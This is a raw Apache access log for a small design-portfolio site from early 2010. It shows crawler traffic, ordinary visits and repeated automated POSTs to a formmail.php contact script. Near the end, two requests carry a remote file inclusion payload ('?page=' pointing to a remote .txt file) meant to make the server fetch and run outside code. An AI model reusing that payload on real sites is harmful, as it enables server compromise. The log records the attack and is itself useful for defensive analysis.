89.248.172.58 - - [25/Jan/2010:07:35:33 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:34 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:34 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:34 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:35 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:35 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:35 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:35 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:36 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:36 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [25/Jan/2010:07:35:36 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.218.116.130 - - [25/Jan/2010:08:34:06 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [25/Jan/2010:09:43:28 -0500] "GET / HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
165.138.97.251 - - [25/Jan/2010:12:15:59 -0500] "GET /flash.html HTTP/1.1" 200 4756 "http://images.google.com/imgres?imgurl=http://alex.jeb.ca/images/_portfolio/flash/annimated_butterfly.gif&imgrefurl=http://alex.jeb.ca/flash.html&usg=__tNaqVupFHVpi2fP0IaPPNBcTjVM=&h=75&w=75&sz=1&hl=en&start=99&tbnid=q9i2dvIuXdOzUM:&tbnh=71&tbnw=71&prev=/images%3Fq%3Danimated%2Bbutterfly%2Bgif%26gbv%3D2%26ndsp%3D20%26hl%3Den%26safe%3Dactive%26sa%3DN%26start%3D80" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:15:59 -0500] "GET /index.css HTTP/1.1" 200 962 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:15:59 -0500] "GET /top_nav.css HTTP/1.1" 200 841 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:15:59 -0500] "GET /main.js HTTP/1.1" 200 5103 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/venus.gif HTTP/1.1" 200 1148 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/rotating_circles.gif HTTP/1.1" 200 1022 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/venn_diagram.gif HTTP/1.1" 200 884 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/annimated_butterfly.gif HTTP/1.1" 200 514 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/bending_arrow.gif HTTP/1.1" 200 428 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/wine_banner.gif HTTP/1.1" 200 1021 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/_portfolio/flash/finland.gif HTTP/1.1" 200 669 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/bg.gif HTTP/1.1" 200 519 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/on_left.gif HTTP/1.1" 200 478 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/right.gif HTTP/1.1" 200 1986 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/on_right.gif HTTP/1.1" 200 1971 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /images/left.gif HTTP/1.1" 200 493 "http://alex.jeb.ca/flash.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
165.138.97.251 - - [25/Jan/2010:12:16:00 -0500] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
69.19.14.37 - - [25/Jan/2010:19:38:48 -0500] "GET /images/_portfolio/illustrator/venus_butterfly_flyer_sm.gif HTTP/1.1" 200 856 "http://images.google.com/images?hl=en&um=1&q=venus+butterfly&sa=N&start=144&ndsp=18" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.242 - - [25/Jan/2010:20:19:17 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Googlebot-Image/1.0"
66.249.68.242 - - [25/Jan/2010:20:19:17 -0500] "GET /images/_portfolio/photoshop/fulfillment_banner_sm.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
95.108.128.241 - - [25/Jan/2010:21:29:59 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [26/Jan/2010:01:20:08 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [26/Jan/2010:05:10:16 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Yandex/1.01.001 (compatible; Win16; I)"
65.55.207.118 - - [26/Jan/2010:07:08:01 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.118 - - [26/Jan/2010:07:09:20 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.108.128.241 - - [26/Jan/2010:09:00:23 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
89.248.172.58 - - [26/Jan/2010:10:13:29 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:30 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:30 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:30 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:31 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:31 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:31 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:32 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:32 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:33 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:33 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:34 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:34 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:34 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:35 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:36 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [26/Jan/2010:10:13:36 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
95.108.128.241 - - [26/Jan/2010:12:50:30 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [26/Jan/2010:15:39:05 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [26/Jan/2010:16:56:57 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.180 - - [27/Jan/2010:04:00:52 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.136 - - [27/Jan/2010:04:27:49 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.136 - - [27/Jan/2010:04:28:49 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.108.128.241 - - [27/Jan/2010:06:25:19 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [27/Jan/2010:11:51:54 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [27/Jan/2010:15:30:28 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [27/Jan/2010:18:14:51 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Yandex/1.01.001 (compatible; Win16; I)"
89.248.172.58 - - [27/Jan/2010:18:54:27 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:28 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:29 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:29 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:30 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:30 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:30 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:31 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:31 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:31 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:32 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:32 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:33 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:33 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:34 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:35 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [27/Jan/2010:18:54:35 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
95.108.128.241 - - [27/Jan/2010:23:28:58 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [28/Jan/2010:15:46:25 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [28/Jan/2010:20:14:53 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.149 - - [28/Jan/2010:22:23:58 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.149 - - [28/Jan/2010:22:23:59 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.128.241 - - [29/Jan/2010:02:08:58 -0500] "GET / HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [29/Jan/2010:08:03:03 -0500] "GET /illustrator.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.182 - - [29/Jan/2010:09:06:56 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.108.128.241 - - [29/Jan/2010:11:00:06 -0500] "GET /pages.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [29/Jan/2010:16:10:27 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [29/Jan/2010:23:24:26 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [30/Jan/2010:03:34:58 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [30/Jan/2010:07:45:36 -0500] "GET /photoshop.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
89.248.171.19 - - [30/Jan/2010:09:23:21 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.171.19 - - [30/Jan/2010:09:23:23 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.171.19 - - [30/Jan/2010:09:23:23 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.171.19 - - [30/Jan/2010:09:23:23 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.171.19 - - [30/Jan/2010:09:23:24 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.14 - - [30/Jan/2010:09:40:19 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.14 - - [30/Jan/2010:09:40:19 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.14 - - [30/Jan/2010:09:40:20 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.14 - - [30/Jan/2010:09:40:20 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.14 - - [30/Jan/2010:09:40:20 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.218.116.130 - - [30/Jan/2010:16:00:34 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.102.63.27 - - [30/Jan/2010:17:46:52 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.102.63.27 - - [30/Jan/2010:17:46:53 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.102.63.27 - - [30/Jan/2010:17:46:53 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.102.63.27 - - [30/Jan/2010:17:46:53 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.102.63.27 - - [30/Jan/2010:17:46:54 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
95.108.128.241 - - [30/Jan/2010:19:06:09 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Yandex/1.01.001 (compatible; Win16; I)"
65.55.207.135 - - [31/Jan/2010:07:47:03 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.135 - - [31/Jan/2010:07:48:08 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.108.128.241 - - [31/Jan/2010:08:35:51 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
65.55.106.179 - - [31/Jan/2010:09:18:15 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.179 - - [31/Jan/2010:09:19:12 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.108.128.241 - - [31/Jan/2010:09:26:28 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "Yandex/1.01.001 (compatible; Win16; I)"
65.55.109.180 - - [31/Jan/2010:13:36:48 -0500] "GET /email/origins.html HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
67.218.116.130 - - [31/Jan/2010:16:03:19 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [31/Jan/2010:18:16:18 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [31/Jan/2010:23:29:52 -0500] "GET /contact.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.184 - - [31/Jan/2010:23:51:46 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.130 - - [01/Feb/2010:16:17:14 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.108.128.241 - - [01/Feb/2010:16:17:35 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [01/Feb/2010:21:20:16 -0500] "GET / HTTP/1.1" 200 1984 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.241 - - [01/Feb/2010:23:51:37 -0500] "GET /illustrator.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.65.178 - - [02/Feb/2010:04:46:20 -0500] "GET /robots.txt HTTP/1.1" 404 269 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.178 - - [02/Feb/2010:04:46:20 -0500] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.128.241 - - [02/Feb/2010:09:00:13 -0500] "GET /pages.html HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
196.35.158.183 - - [02/Feb/2010:10:41:22 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
196.35.158.183 - - [02/Feb/2010:10:41:22 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
89.248.172.58 - - [02/Feb/2010:11:45:19 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:19 -0500] "POST /formmail.php HTTP/1.1" 200 355 "http://alex.jeb.ca/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:20 -0500] "GET /formmail.php HTTP/1.1" 200 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:20 -0500] "GET /contact.html HTTP/1.1" 200 6927 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:20 -0500] "GET / HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:20 -0500] "GET /index.html HTTP/1.1" 200 1984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
